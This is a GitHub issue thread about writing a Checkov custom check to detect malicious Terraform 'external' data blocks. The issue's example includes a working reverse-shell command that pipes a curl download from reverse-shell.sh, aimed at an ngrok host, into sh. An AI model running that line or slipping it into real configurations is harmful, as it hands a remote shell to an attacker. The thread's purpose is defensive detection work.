Closed GoliTech closed 11 months ago
hey @GoliTech thanks for reaching out.
I'm not sure, what exactly the question is, are you looking for a built-in check, which would find the issue or you want to create a custom check for it. In general we had a check, which looked for any external
use, but it was too noisy and therefore removed it again. You should always be aware of anything running in an external
data block, because can exfiltrate secrets, running malicious code, etc.
@gruebel thanks for the quick response
That is true I am looking for a check to raise a flag for external
, but there is no built in and I tried to implement my self, how ever after 2 days I still could not implement that, could u please help me?
I even changed the scan function to:
class CustomCheck(BaseResourceCheck):
def __init__(self):
name = "Detect potential reverse shell in external data"
id = "CUSTOM_REVERSE_SHELL_CHECK"
supported_resources = ['azurerm_managed_disk']
categories = [CheckCategories.NETWORKING]
super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
def scan_resource_conf(self, conf):
if 1 == 1:
return CheckResult.FAILED, "Test condition 1 == 1 satisfied."
else:
return CheckResult.PASSED, ""
` just to see if the scanner works or not. it looks checkov does not find this 1==1 condition.
gotcha, you did a small mistake, because data
checks need to use a different parent class, here is an example https://github.com/bridgecrewio/checkov/blob/main/tests/terraform/checks/data/external/external_check/ExternalData.py
depending on how complex your check, is could also write it as a YAML-based one, like here https://github.com/bridgecrewio/checkov/blob/main/tests/terraform/checks/data/external/external_check/ExternalData.py
thanks a lot for your help.
Describe the issue if there is a malicious code block inside the configuration, checkov could not find it
Examples data "external" "example" { program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"] }
Version (please complete the following information):
Additional context I even created a check but did not work
from checkov.common.models.enums import CheckResult, CheckCategories from checkov.terraform.checks.resource.base_resource_check import BaseResourceCheck from enum import Enum
class CheckCategories(Enum): SECURITY = "SECURITY"
class CustomCheck(BaseResourceCheck): def init(self): name = "Detect potential reverse shell in external data" id = "CUSTOM_REVERSE_SHELL_CHECK" supported_resources = ["data"] categories = [CheckCategories.SECURITY] super().init(name=name, id=id, categories=categories, supported_resources=supported_resources)
check_id = CustomCheck()